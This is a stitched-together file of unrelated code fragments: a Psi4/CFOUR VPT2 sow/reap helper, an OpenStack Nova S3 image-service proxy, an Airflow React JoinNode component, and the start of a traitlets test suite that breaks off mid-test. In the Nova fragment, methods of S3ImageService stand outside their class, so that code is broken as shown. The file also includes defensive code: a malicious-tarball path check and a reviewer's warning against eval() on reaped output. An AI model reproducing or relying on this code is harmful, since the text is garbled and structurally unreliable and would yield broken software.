            c4mol = qcdb.Molecule(results['CURRENT MOLECULE'])
            c4mol.update_geometry()
        # C: Run the job and collect results
        else:
            # Prepare Cfour skeleton calc directory
            os.chdir(scrdir + c4scrdir)  # psi_scratch/cfour
            if os.path.exists('scr.' + item):
                shutil.rmtree('scr.' + item)
            os.mkdir('scr.' + item)
            os.chdir('scr.' + item)  # psi_scratch/cfour/scr.000-004
            with open('ZMAT', 'w') as handle:
                handle.write(zmat)
            shutil.copy2('../harm/GENBAS', 'GENBAS')
            #os.chdir(scrdir + '/scr.' + item)
            #run_cfour_module('xja2fja')
            #with open('FJOBARC', 'r') as handle:
            #    fjobarc = handle.read()
            # Run Cfour calc using ZMAT & GENBAS in scratch, outdir redirects to outfile
            os.chdir(outdir)  # current_directory
            core.get_active_molecule().set_name('blank_molecule_psi4_yo')
            energy('cfour', path=c4scrdir + '/scr.' + item)
            # os.chdir(scrdir + '/scr.' + item)
            fje = core.variable('CURRENT ENERGY')
            fjgrd = p4util.mat2arr(core.get_gradient())
            # Dipole conversion Debye -> a.u. for the FJOBARC file.
            fjdip = [core.variable('CURRENT DIPOLE X') / constants.dipmom_au2debye,
                     core.variable('CURRENT DIPOLE Y') / constants.dipmom_au2debye,
                     core.variable('CURRENT DIPOLE Z') / constants.dipmom_au2debye]
            c4mol = qcdb.Molecule(core.get_active_molecule().create_psi4_string_from_molecule())
            c4mol.update_geometry()
        # Get map btwn ZMAT and C4 orientation, then use it, grad and dipole to forge FJOBARC file
        fjobarc = qcdb.cfour.format_fjobarc(fje,
            *qcdb.cfour.backtransform(chgeMol=zmmol, permMol=c4mol), gradient=fjgrd, dipole=fjdip)
    # Psi4 for gradients
    else:
        # Prepare Cfour skeleton calc directory
        os.chdir(scrdir + c4scrdir)  # psi_scratch/cfour
        if os.path.exists('scr.' + item):
            shutil.rmtree('scr.' + item)
        os.mkdir('scr.' + item)
        os.chdir('scr.' + item)  # psi_scratch/cfour/scr.000-004
        with open('ZMAT', 'w') as handle:
            handle.write(zmat)
        shutil.copy2('../harm/GENBAS', 'GENBAS')
        # Run Cfour skeleton calc and extract qcdb.Molecule at needed C4 orientation
        with open('partial.out', 'w') as handle:
            handle.write(run_cfour_module('xjoda'))
            handle.write(run_cfour_module('xvmol'))
            handle.write(run_cfour_module('xvmol2ja'))
        core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('JOBARC (binary)', item))
        c4mol = qcdb.cfour.jajo2mol(qcdb.jajo.getrec(['COORD ', 'ATOMCHRG', 'MAP2ZMAT', 'IFLAGS ']))
        # S/R: Reap results from output file
        if isSowReap:
            isOk, msg, results = reap_job_validate(outdir, 'VPT2', item, linkage,
                ['CURRENT ENERGY', 'CURRENT DIPOLE', 'CURRENT GRADIENT'])
            if not isOk:
                raise ValidationError(msg)
            fje = results['CURRENT ENERGY']
            fjgrd = results['CURRENT GRADIENT']
            # See NOTE(review) above about *item* reuse in this comprehension.
            fjdip = [item / constants.dipmom_au2debye for item in results['CURRENT DIPOLE']]
        # C: Run the job and collect results
        else:
            # Isolate psi4 scratch for this displacement under its own namespace.
            core.IO.set_default_namespace(item)
            molecule = geometry(zmmol.create_psi4_string_from_molecule(), 'disp-' + item)
            molecule.update_geometry()
            gradient(lowername, **kwargs)
            fje = core.variable('CURRENT ENERGY')
            fjgrd = p4util.mat2arr(core.get_gradient())
            fjdip = [core.variable('CURRENT DIPOLE X') / constants.dipmom_au2debye,
                     core.variable('CURRENT DIPOLE Y') / constants.dipmom_au2debye,
                     core.variable('CURRENT DIPOLE Z') / constants.dipmom_au2debye]
        # Transform results into C4 orientation (defined by c4mol) & forge FJOBARC file
        fjobarc = qcdb.cfour.format_fjobarc(fje,
            *qcdb.cfour.backtransform(chgeMol=zmmol, permMol=c4mol, chgeGrad=fjgrd, chgeDip=fjdip))
    return fjobarc
def vpt2_instructions(stage, dir, zmats):
    """Stores all the instructions to the user for running
    :py:func:`~wrappers_cfour.vpt2` in sowreap mode. Depending on the
    *stage*, Pieces together instruction strings for the appropriate
    *stage* individualized by working directory *dir* and sown inputs
    *zmats* information.
    """
    # One formatted 'psi4 <in> <out>' line per sown job; shared by both stages.
    stepFiles = ''
    for zm12 in sorted(zmats):
        stepFiles += """ psi4 %-27s %-27s\n""" % ('VPT2-' + zm12 + '.in', 'VPT2-' + zm12 + '.out')
    step0 = """
The vpt2 sow/reap procedure has been selected through mode='sowreap'. This
output file, the corresponding input file, and the data persistence file
must not be edited by the user over the course of the sow/reap procedure.
Throughout, psi4 can be invoked to move to the next stage of the procedure
or to tally up the 'sown' jobs. This output file is overwritten each time
psi4 is invoked, but all results and instructions accumulate.
This procedure involves two stages of distributed calculations, harmonic and
anharmonic, and a mimimum of three invokations of psi4 on the original input
file (including the one that initially generated this text). From the input
geometry (0), displacements are generated for which gradients are required.
Input files for these are 'sown' in the current directory (1). Upon
completion, their output files are 'reaped' into a harmonic force field (2).
At displacements along the normal coordinates, further displacements are
generated for which gradients are required. Input files for these are again
'sown' in the current directory (3). Upon completion, their output files are
'reaped' into an anharmonic force field (4), terminating the vpt2 procedure.
Follow the instructions below to continue.
(0) Read Only
--------------
%s
%s
%s
""" % (dir + '/' + os.path.splitext(core.outfile_name())[0] + '.in',
       dir + '/' + core.outfile_name(),
       dir + '/' + os.path.splitext(core.outfile_name())[0] + '.shelf')
    step1 = """
(1) Sow
--------
Run all of the VPT2-000-*.in input files on any variety of computer
architecture. The output file names must be as given below (default).
"""
    step2 = """
(2) Reap
---------
Gather all the resulting output files in this directory along with the
three read-only files from (0). Invoke psi4 again. The job will be
trivial in length (unless sto-3g integrals on the molecule are costly)
and give results for the harmonic frequency stage in this output file. It
will also supply the next set of instructions.
psi4 %-27s %-27s
""" % (os.path.splitext(core.outfile_name())[0] + '.in', core.outfile_name())
    step3 = """
(3) Sow
--------
Run all of the VPT2-*-*.in input files on any variety of computer
architecture. The output file names must be as given below (default).
"""
    step4 = """
(4) Reap
---------
Gather all the resulting output files in this directory along with the
three read-only files from (0). Invoke psi4 again. The job will be
trivial in length (unless sto-3g integrals on the molecule are costly)
and give results for the harmonic and anharmonic frequency stages in this
output file.
psi4 %-27s %-27s
""" % (os.path.splitext(core.outfile_name())[0] + '.in', core.outfile_name())
    # NOTE(review): a *stage* other than the two below leaves `instructions`
    # unbound (UnboundLocalError); callers only ever pass these two values.
    if stage == 'harmonic':
        instructions = step0 + step1 + stepFiles + step2
    elif stage == 'anharmonic':
        instructions = step0 + step3 + stepFiles + step4
    return instructions
def sown_jobs_status(dir, prefix, zmats, validate_func=None, linkage=None, keys=None):
    """Evaluate the output file status of jobs in *zmats* which should
    exist at *dir* + '/' + prefix + '-' + job + '.out'. Returns string with
    formatted summary of job status and boolean of whether all complete.
    Return boolean *isOk* signals whether all *zmats* have completed and,
    if *validate_func* present, are validated.

    *validate_func* is called as validate_func(dir, prefix, job, linkage, keys)
    and must return (isOkJob, msg, reapings); pass None to skip validation.
    """
    isOk = True
    msgError = ''
    instructions = '\n'
    instructions += p4util.banner(prefix + ' Status: ' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), strNotOutfile=True)
    instructions += '\n'
    for job in sorted(zmats):
        outfile = dir + '/' + prefix + '-' + job + '.out'
        fjafile = dir + '/' + prefix + '-' + job + '.fja'
        # Columns: job label, Waiting, Running, Completed, validation verdict.
        formatArgs = [prefix + '-' + job, '', '', '', '']
        if os.path.isfile(outfile):
            with open(outfile, 'r') as handle:
                for line in handle:
                    # Psi4 prints this tagline only at successful termination.
                    if line.find('Buy a developer a beer!') > -1:
                        formatArgs[3] = 'Completed'
                        # Bug fix: honor the *validate_func* argument (as the
                        # docstring promises) instead of the hard-coded
                        # module-level reap_job_validate, which is never None.
                        if validate_func is not None:
                            isOkJob, msg, temp = validate_func(dir, prefix, job, linkage, keys)
                            if isOkJob:
                                formatArgs[4] = '& Validated'
                            else:
                                isOk = False
                                msgError += msg
                                formatArgs[4] = 'INVALID'
                        break
                else:
                    # Loop exhausted without finding the tagline: still running.
                    isOk = False
                    formatArgs[2] = 'Running'
        elif os.path.isfile(fjafile):
            # Cfour-direct jobs deposit a .fja file instead of a psi4 .out.
            formatArgs[3] = 'Completed'
        else:
            isOk = False
            formatArgs[1] = 'Waiting'
        instructions += """ {0:<27} {1:^10} {2:^10} {3:^10} {4:^10}\n""".format(*formatArgs)
    instructions += '\n' + msgError + '\n\n'
    return isOk, instructions
def reap_job_validate(dir, prefix, item, linkage, keys):
    """For a given output file whose path is constructed with
    *dir* + '/' + *prefix* + '-' + *item* + '.out', tests that the file
    exists and has *prefix* RESULTS lines for each piece of information
    requested in list *keys* and that those lines correspond to the
    appropriate *linkage* and *item*. Returns *keys* along with their
    scanned values in dict *reapings*, along with error and success
    messages in *instructions* and a boolean *isOk* indicating whether
    all *keys* reaped sucessfully.
    """
    isOk = True
    instructions = ''
    reapings = {}
    outfile = dir + '/' + prefix + '-' + item + '.out'
    try:
        with open(outfile, 'r') as handle:
            for line in handle:
                # RESULT lines are written by the epilogue in vpt2_sow_files().
                if line.find(prefix + ' RESULT:') == 0:
                    sline = line.split()
                    # Tokens 2..6 must echo the expected linkage (pid) and item.
                    if sline[2:7] == ['linkage', str(linkage), 'for', 'item', item]:
                        yieldsAt = line.find('yields')
                        beingAt = line.find('being')
                        if beingAt > yieldsAt > -1:
                            # key sits between 'yields' and 'being'; value follows 'being'.
                            key = line[yieldsAt + 6:beingAt].strip()
                            val = line[beingAt + 5:].strip()
                            if key in keys:
                                # NOTE(review): eval() on text reaped from a user-run
                                # output file — acceptable only because sow/reap files
                                # are produced by this same workflow; do not reuse on
                                # untrusted input (ast.literal_eval would be safer).
                                reapings[key] = eval(val)
                                #core.print_out(' CFOUR scratch file %s for %s has been read\n' % ('JOBARC', zm12))
                        else:
                            isOk = False
                            instructions += """Outfile file %s
has corrupted sowreap result line:\n%s\n\n""" % (outfile, line)
                    else:
                        isOk = False
                        instructions += """Outfile file %s
has sowreap result of either incompatible linkage (observed: %s, expected: %s)
or incompatible job affiliation (observed: %s, expected: %s).\n\n""" % \
                            (outfile, sline[3], linkage, sline[6], item)
            else:
                # for-else with no break: always runs after the scan; verify
                # that every requested key was actually reaped.
                if len(reapings) != len(keys):
                    isOk = False
                    instructions += """Output file %s
has missing results (observed: %s, expected: %s).\n\n""" % \
                        (outfile, reapings.keys(), keys)
    except IOError:
        isOk = False
        instructions += """Output file %s
that was judged present and complete at the beginning of this
job is now missing. Replace it and invoke psi4 again.\n\n""" % (outfile)
    # return file contents in instructions
    return isOk, instructions, reapings
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Proxy AMI-related calls from cloud controller to objectstore service."""
import base64
import binascii
import os
import shutil
import tarfile
import tempfile
import boto.s3.connection
import eventlet
from lxml import etree
from oslo.config import cfg
from nova.api.ec2 import ec2utils
import nova.cert.rpcapi
from nova import exception
from nova.image import glance
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
from nova import utils
# Module-level logger for this proxy service.
LOG = logging.getLogger(__name__)
# Options controlling how images are fetched from the s3-compatible
# objectstore and where they are decrypted locally.
s3_opts = [
    cfg.StrOpt('image_decryption_dir',
               default='/tmp',
               help='parent dir for tempdir used for image decryption'),
    cfg.StrOpt('s3_host',
               default='$my_ip',
               help='hostname or ip for OpenStack to use when accessing '
                    'the s3 api'),
    cfg.IntOpt('s3_port',
               default=3333,
               help='port used when accessing the s3 api'),
    cfg.StrOpt('s3_access_key',
               default='notchecked',
               help='access key to use for s3 server for images'),
    cfg.StrOpt('s3_secret_key',
               default='notchecked',
               help='secret key to use for s3 server for images'),
    cfg.BoolOpt('s3_use_ssl',
                default=False,
                help='whether to use ssl when talking to s3'),
    cfg.BoolOpt('s3_affix_tenant',
                default=False,
                help='whether to affix the tenant id to the access key '
                     'when downloading from s3'),
]
CONF = cfg.CONF
CONF.register_opts(s3_opts)
# 'my_ip' backs the '$my_ip' interpolation in the s3_host default above.
CONF.import_opt('my_ip', 'nova.netconf')
class S3ImageService(object):
    """Wraps an existing image service to support s3 based register."""
    # translate our internal state to states valid by the EC2 API documentation
    # (the EC2 API only exposes pending/failed/available).
    image_state_map = {'downloading': 'pending',
                       'failed_download': 'failed',
                       'decrypting': 'pending',
                       'failed_decrypt': 'failed',
                       'untarring': 'pending',
                       'failed_untar': 'failed',
                       'uploading': 'pending',
                       'failed_upload': 'failed',
                       'available': 'available'}
def __init__(self, service=None, *args, **kwargs):
    """Wrap *service* (default: the configured glance image service)."""
    # RPC client to the cert service, used for key/image decryption.
    self.cert_rpcapi = nova.cert.rpcapi.CertAPI()
    self.service = service or glance.get_default_image_service()
    # NOTE(review): re-running __init__ on an already-constructed service
    # instance forwards this wrapper's ctor args to it — looks intentional,
    # but confirm the wrapped service tolerates double initialization.
    self.service.__init__(*args, **kwargs)
def _translate_uuids_to_ids(self, context, images):
    """Apply the uuid-to-int id translation to each image in *images*."""
    translated = []
    for image in images:
        translated.append(self._translate_uuid_to_id(context, image))
    return translated
def _translate_uuid_to_id(self, context, image):
    """Return a copy of *image* with glance uuids replaced by EC2 int ids.

    Translates the top-level 'id', the dependent kernel/ramdisk ids in
    'properties', and maps internal image_state onto EC2-visible states.
    """
    image_copy = image.copy()
    try:
        image_uuid = image_copy['id']
    except KeyError:
        # No id present; nothing to translate at the top level.
        pass
    else:
        image_copy['id'] = ec2utils.glance_id_to_id(context, image_uuid)
    for prop in ['kernel_id', 'ramdisk_id']:
        try:
            image_uuid = image_copy['properties'][prop]
        except (KeyError, ValueError):
            # 'properties' or the specific prop may be absent.
            pass
        else:
            image_id = ec2utils.glance_id_to_id(context, image_uuid)
            image_copy['properties'][prop] = image_id
    try:
        # Collapse internal states to the EC2 pending/failed/available set.
        image_copy['properties']['image_state'] = self.image_state_map[
            image['properties']['image_state']]
    except (KeyError, ValueError):
        # Missing or unrecognized state is left untouched.
        pass
    return image_copy
def _translate_id_to_uuid(self, context, image):
    """Return a copy of *image* with EC2 int ids replaced by glance uuids."""
    converted = image.copy()
    try:
        ec2_id = converted['id']
    except KeyError:
        # No top-level id to translate.
        pass
    else:
        converted['id'] = ec2utils.id_to_glance_id(context, ec2_id)
    for key in ['kernel_id', 'ramdisk_id']:
        try:
            ec2_id = converted['properties'][key]
        except (KeyError, ValueError):
            # Properties dict or the entry itself may be missing.
            continue
        converted['properties'][key] = ec2utils.id_to_glance_id(context, ec2_id)
    return converted
def create(self, context, metadata, data=None):
    """Create an image.
    metadata['properties'] should contain image_location.
    """
    # Registration is delegated entirely to the s3 manifest path.
    return self._s3_create(context, metadata)
def delete(self, context, image_id):
    """Delete the backing image for the EC2-style *image_id*."""
    glance_uuid = ec2utils.id_to_glance_id(context, image_id)
    self.service.delete(context, glance_uuid)
def update(self, context, image_id, metadata, data=None):
    """Update image *image_id*, translating ids into and out of glance form."""
    glance_uuid = ec2utils.id_to_glance_id(context, image_id)
    glance_metadata = self._translate_id_to_uuid(context, metadata)
    updated = self.service.update(context, glance_uuid, glance_metadata, data)
    return self._translate_uuid_to_id(context, updated)
def detail(self, context, **kwargs):
    """List images, returning them with EC2-style int ids."""
    #NOTE(bcwaldon): sort asc to make sure we assign lower ids
    # to older images
    if 'sort_dir' not in kwargs:
        kwargs['sort_dir'] = 'asc'
    listed = self.service.detail(context, **kwargs)
    return self._translate_uuids_to_ids(context, listed)
def show(self, context, image_id):
    """Fetch image *image_id* (EC2 int id), returned with int ids."""
    glance_uuid = ec2utils.id_to_glance_id(context, image_id)
    shown = self.service.show(context, glance_uuid)
    return self._translate_uuid_to_id(context, shown)
@staticmethod
def _conn(context):
    """Build a boto S3 connection from the registered s3_* options."""
    # NOTE(vish): access and secret keys for s3 server are not
    # checked in nova-objectstore
    access_key = CONF.s3_access_key
    if CONF.s3_affix_tenant:
        # Tag the access key with the tenant so the objectstore can
        # scope the download.
        access_key = '%s:%s' % (access_key, context.project_id)
    return boto.s3.connection.S3Connection(
        aws_access_key_id=access_key,
        aws_secret_access_key=CONF.s3_secret_key,
        is_secure=CONF.s3_use_ssl,
        calling_format=boto.s3.connection.OrdinaryCallingFormat(),
        port=CONF.s3_port,
        host=CONF.s3_host)
@staticmethod
def _download_file(bucket, filename, local_dir):
    """Fetch *filename* from *bucket* into *local_dir*; return local path."""
    target = os.path.join(local_dir, os.path.basename(filename))
    bucket.get_key(filename).get_contents_to_filename(target)
    return target
def _s3_parse_manifest(self, context, metadata, manifest):
    """Parse the AMI XML *manifest* and register a queued glance image.

    Returns (parsed manifest element, image dict with EC2 int id, glance
    uuid) so the caller can keep using the underlying image service.
    """
    manifest = etree.fromstring(manifest)
    image_format = 'ami'
    try:
        kernel_id = manifest.find('machine_configuration/kernel_id').text
        # The literal string 'true' marks this image as itself being a kernel.
        if kernel_id == 'true':
            image_format = 'aki'
            kernel_id = None
    except Exception:
        # Element absent (find() returned None, so .text raised) — no kernel.
        kernel_id = None
    try:
        ramdisk_id = manifest.find('machine_configuration/ramdisk_id').text
        # Likewise, 'true' marks the image as being a ramdisk itself.
        if ramdisk_id == 'true':
            image_format = 'ari'
            ramdisk_id = None
    except Exception:
        ramdisk_id = None
    try:
        arch = manifest.find('machine_configuration/architecture').text
    except Exception:
        # Default architecture when the manifest does not specify one.
        arch = 'x86_64'
    # NOTE(yamahata):
    # EC2 ec2-bundle-image --block-device-mapping accepts
    # <virtual name>=<device name> where
    # virtual name = {ami, root, swap, ephemeral<N>}
    # where N is no negative integer
    # device name = the device name seen by guest kernel.
    # They are converted into
    # block_device_mapping/mapping/{virtual, device}
    #
    # Do NOT confuse this with ec2-register's block device mapping
    # argument.
    mappings = []
    try:
        block_device_mapping = manifest.findall('machine_configuration/'
                                                'block_device_mapping/'
                                                'mapping')
        for bdm in block_device_mapping:
            mappings.append({'virtual': bdm.find('virtual').text,
                             'device': bdm.find('device').text})
    except Exception:
        mappings = []
    properties = metadata['properties']
    properties['architecture'] = arch

    def _translate_dependent_image_id(image_key, image_id):
        # Resolve an EC2-style dependent image id to its glance uuid.
        image_uuid = ec2utils.ec2_id_to_glance_id(context, image_id)
        properties[image_key] = image_uuid

    if kernel_id:
        _translate_dependent_image_id('kernel_id', kernel_id)
    if ramdisk_id:
        _translate_dependent_image_id('ramdisk_id', ramdisk_id)
    if mappings:
        properties['mappings'] = mappings
    metadata.update({'disk_format': image_format,
                     'container_format': image_format,
                     'status': 'queued',
                     'is_public': False,
                     'properties': properties})
    metadata['properties']['image_state'] = 'pending'
    #TODO(bcwaldon): right now, this removes user-defined ids.
    # We need to re-enable this.
    metadata.pop('id', None)
    image = self.service.create(context, metadata)
    # extract the new uuid and generate an int id to present back to user
    image_uuid = image['id']
    image['id'] = ec2utils.glance_id_to_id(context, image_uuid)
    # return image_uuid so the caller can still make use of image_service
    return manifest, image, image_uuid
def _s3_create(self, context, metadata):
    """Gets a manifest from s3 and makes an image.

    Synchronously fetches and parses the manifest, registers the image
    (status 'queued'), then spawns a greenthread that downloads,
    decrypts, untars and uploads the real image data, advancing the
    image's 'image_state' property at each stage.
    """
    image_path = tempfile.mkdtemp(dir=CONF.image_decryption_dir)
    # image_location has the form '<bucket>/<manifest key>'.
    image_location = metadata['properties']['image_location'].lstrip('/')
    bucket_name = image_location.split('/')[0]
    manifest_path = image_location[len(bucket_name) + 1:]
    bucket = self._conn(context).get_bucket(bucket_name)
    key = bucket.get_key(manifest_path)
    manifest = key.get_contents_as_string()
    # Registers the image and returns the parsed manifest plus the
    # glance uuid used for all subsequent state updates.
    manifest, image, image_uuid = self._s3_parse_manifest(context,
                                                          metadata,
                                                          manifest)

    def delayed_create():
        """This handles the fetching and decrypting of the part files."""
        context.update_store()
        log_vars = {'image_location': image_location,
                    'image_path': image_path}

        def _update_image_state(context, image_uuid, image_state):
            # Only touches the image_state property; keeps other props.
            metadata = {'properties': {'image_state': image_state}}
            self.service.update(context, image_uuid, metadata,
                                purge_props=False)

        def _update_image_data(context, image_uuid, image_data):
            # Uploads the actual bits without changing properties.
            metadata = {}
            self.service.update(context, image_uuid, metadata, image_data,
                                purge_props=False)

        try:
            _update_image_state(context, image_uuid, 'downloading')
            try:
                parts = []
                elements = manifest.find('image').getiterator('filename')
                for fn_element in elements:
                    part = self._download_file(bucket,
                                               fn_element.text,
                                               image_path)
                    parts.append(part)
                # NOTE(vish): this may be suboptimal, should we use cat?
                enc_filename = os.path.join(image_path, 'image.encrypted')
                with open(enc_filename, 'w') as combined:
                    for filename in parts:
                        with open(filename) as part:
                            shutil.copyfileobj(part, combined)
            except Exception:
                LOG.exception(_("Failed to download %(image_location)s "
                                "to %(image_path)s"), log_vars)
                _update_image_state(context, image_uuid, 'failed_download')
                return
            _update_image_state(context, image_uuid, 'decrypting')
            try:
                hex_key = manifest.find('image/ec2_encrypted_key').text
                encrypted_key = binascii.a2b_hex(hex_key)
                hex_iv = manifest.find('image/ec2_encrypted_iv').text
                encrypted_iv = binascii.a2b_hex(hex_iv)
                dec_filename = os.path.join(image_path, 'image.tar.gz')
                self._decrypt_image(context, enc_filename, encrypted_key,
                                    encrypted_iv, dec_filename)
            except Exception:
                LOG.exception(_("Failed to decrypt %(image_location)s "
                                "to %(image_path)s"), log_vars)
                _update_image_state(context, image_uuid, 'failed_decrypt')
                return
            _update_image_state(context, image_uuid, 'untarring')
            try:
                unz_filename = self._untarzip_image(image_path,
                                                    dec_filename)
            except Exception:
                LOG.exception(_("Failed to untar %(image_location)s "
                                "to %(image_path)s"), log_vars)
                _update_image_state(context, image_uuid, 'failed_untar')
                return
            _update_image_state(context, image_uuid, 'uploading')
            try:
                with open(unz_filename) as image_file:
                    _update_image_data(context, image_uuid, image_file)
            except Exception:
                LOG.exception(_("Failed to upload %(image_location)s "
                                "to %(image_path)s"), log_vars)
                _update_image_state(context, image_uuid, 'failed_upload')
                return
            metadata = {'status': 'active',
                        'properties': {'image_state': 'available'}}
            self.service.update(context, image_uuid, metadata,
                                purge_props=False)
            # NOTE(review): scratch dir is only removed on full success;
            # failed runs appear to leave image_path behind - confirm.
            shutil.rmtree(image_path)
        except exception.ImageNotFound:
            LOG.info(_("Image %s was deleted underneath us"), image_uuid)
            return

    eventlet.spawn_n(delayed_create)
    return image
def _decrypt_image(self, context, encrypted_filename, encrypted_key,
                   encrypted_iv, decrypted_filename):
    """Decrypt an image file with openssl using an RPC-decrypted key/iv.

    The AES key and IV are themselves encrypted; both are sent (base64
    encoded) to the cert service for decryption, then handed to
    ``openssl enc -d -aes-128-cbc`` to produce the plaintext file.

    :raises exception.NovaException: if key/iv decryption or the
        openssl invocation fails.
    """
    elevated = context.elevated()

    def rpc_decrypt(ciphertext, failure_msg):
        # Shared decrypt-or-raise path for both the key and the iv.
        try:
            return self.cert_rpcapi.decrypt_text(
                elevated,
                project_id=context.project_id,
                text=base64.b64encode(ciphertext))
        except Exception as exc:
            raise exception.NovaException(failure_msg % exc)

    key = rpc_decrypt(encrypted_key,
                      _('Failed to decrypt private key: %s'))
    iv = rpc_decrypt(encrypted_iv,
                     _('Failed to decrypt initialization '
                       'vector: %s'))
    try:
        utils.execute('openssl', 'enc',
                      '-d', '-aes-128-cbc',
                      '-in', '%s' % (encrypted_filename,),
                      '-K', '%s' % (key,),
                      '-iv', '%s' % (iv,),
                      '-out', '%s' % (decrypted_filename,))
    except processutils.ProcessExecutionError as exc:
        raise exception.NovaException(_('Failed to decrypt image file '
                                        '%(image_file)s: %(err)s') %
                                      {'image_file': encrypted_filename,
                                       'err': exc.stdout})
@staticmethod
def _test_for_malicious_tarball(path, filename):
    """Raises exception if extracting tarball would escape extract path.

    :param path: directory the tarball is intended to be extracted into
    :param filename: path of the gzipped tarball to inspect
    :raises exception.NovaException: if any archive member would
        resolve to a location outside ``path``
    """
    base = os.path.abspath(path)
    # 'r|gz' is streaming mode, matching the reader in _untarzip_image.
    # The with-block guarantees the handle is closed on any outcome.
    with tarfile.open(filename, 'r|gz') as tar_file:
        for n in tar_file.getnames():
            resolved = os.path.abspath(os.path.join(base, n))
            # A bare startswith(path) prefix test wrongly accepts
            # sibling dirs (e.g. '/tmp/foobar' when extracting into
            # '/tmp/foo'), so require the extract dir itself or a path
            # strictly under it.
            if resolved != base and not resolved.startswith(
                    base + os.path.sep):
                raise exception.NovaException(
                    _('Unsafe filenames in image'))
@staticmethod
def _untarzip_image(path, filename):
    """Safely extract a gzipped tarball and return the first member.

    :param path: destination directory for extraction
    :param filename: gzipped tarball to extract
    :returns: first extracted member's name joined onto ``path``
    :raises exception.NovaException: if the tarball contains unsafe
        member names (via _test_for_malicious_tarball)
    """
    S3ImageService._test_for_malicious_tarball(path, filename)
    # The with-block fixes a leak: the original never closed the
    # archive when extractall()/getnames() raised.
    with tarfile.open(filename, 'r|gz') as tar_file:
        tar_file.extractall(path)
        # In stream mode the member list is only complete after the
        # archive has been read, i.e. after extractall().
        image_file = tar_file.getnames()[0]
    return os.path.join(path, image_file)
/*!
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import { Box } from "@chakra-ui/react";
import type { NodeProps, Node as NodeType } from "@xyflow/react";
import { NodeWrapper } from "./NodeWrapper";
import type { CustomNodeProps } from "./reactflowUtils";
/**
 * Node rendered for "join" points in the graph view: a filled box whose
 * border radius equals its width (presumably width === height upstream,
 * so it draws as a circle - confirm against the layout code).
 */
export const JoinNode = ({ data }: NodeProps<NodeType<CustomNodeProps, "join">>) => {
  const { height, width } = data;

  return (
    <NodeWrapper>
      <Box
        bg="border.inverted"
        borderRadius={`${width}px`}
        height={`${height}px`}
        width={`${width}px`}
      />
    </NodeWrapper>
  );
};
# encoding: utf-8
"""Tests for traitlets.traitlets."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
#
# Adapted from enthought.traits, Copyright (c) Enthought, Inc.,
# also under the terms of the Modified BSD License.
import pickle
import re
import sys
from ._warnings import expected_warnings
from unittest import TestCase
import pytest
from pytest import mark
from traitlets import (
HasTraits, MetaHasTraits, TraitType, Any, Bool, CBytes, Dict, Enum,
Int, CInt, Long, CLong, Integer, Float, CFloat, Complex, Bytes, Unicode,
TraitError, Union, All, Undefined, Type, This, Instance, TCPAddress,
List, Tuple, ObjectName, DottedObjectName, CRegExp, link, directional_link,
ForwardDeclaredType, ForwardDeclaredInstance, validate, observe, default,
observe_compat, BaseDescriptor, HasDescriptors,
)
import six
def change_dict(*ordered_values):
    """Build a traitlets change dict from positional values.

    Values map positionally onto ('name', 'old', 'new', 'owner',
    'type'); fewer values yield a partial dict.
    """
    keys = ('name', 'old', 'new', 'owner', 'type')
    return {key: value for key, value in zip(keys, ordered_values)}
#-----------------------------------------------------------------------------
# Helper classes for testing
#-----------------------------------------------------------------------------
class HasTraitsStub(HasTraits):
    """HasTraits subclass recording the last delivered notification.

    Each field of the change dict is copied to a ``_notify_<field>``
    attribute so tests can assert on what was delivered.
    """

    def notify_change(self, change):
        for field in ('name', 'old', 'new', 'type'):
            setattr(self, '_notify_' + field, change[field])
#-----------------------------------------------------------------------------
# Test classes
#-----------------------------------------------------------------------------
class TestTraitType(TestCase):
    """Tests for the base TraitType descriptor: validation, defaults,
    dynamic initializers and (deprecated) metadata access."""

    def test_get_undefined(self):
        class A(HasTraits):
            a = TraitType
        a = A()
        # No default and no assignment -> reading raises.
        with self.assertRaises(TraitError):
            a.a

    def test_set(self):
        class A(HasTraitsStub):
            a = TraitType
        a = A()
        a.a = 10
        self.assertEqual(a.a, 10)
        self.assertEqual(a._notify_name, 'a')
        self.assertEqual(a._notify_old, Undefined)
        self.assertEqual(a._notify_new, 10)

    def test_validate(self):
        # A custom validate() may replace the assigned value entirely.
        class MyTT(TraitType):
            def validate(self, inst, value):
                return -1
        class A(HasTraitsStub):
            tt = MyTT
        a = A()
        a.tt = 10
        self.assertEqual(a.tt, -1)

    def test_default_validate(self):
        class MyIntTT(TraitType):
            def validate(self, obj, value):
                if isinstance(value, int):
                    return value
                self.error(obj, value)
        class A(HasTraits):
            tt = MyIntTT(10)
        a = A()
        self.assertEqual(a.tt, 10)
        # Defaults are validated when the HasTraits is instantiated
        class B(HasTraits):
            tt = MyIntTT('bad default')
        self.assertRaises(TraitError, B)

    def test_info(self):
        class A(HasTraits):
            tt = TraitType
        a = A()
        self.assertEqual(A.tt.info(), 'any value')

    def test_error(self):
        class A(HasTraits):
            tt = TraitType
        a = A()
        self.assertRaises(TraitError, A.tt.error, a, 10)

    def test_deprecated_dynamic_initializer(self):
        # Old-style magic-named _x_default methods still work.
        class A(HasTraits):
            x = Int(10)
            def _x_default(self):
                return 11
        class B(A):
            x = Int(20)
        class C(A):
            def _x_default(self):
                return 21
        a = A()
        self.assertEqual(a._trait_values, {})
        self.assertEqual(a.x, 11)
        self.assertEqual(a._trait_values, {'x': 11})
        b = B()
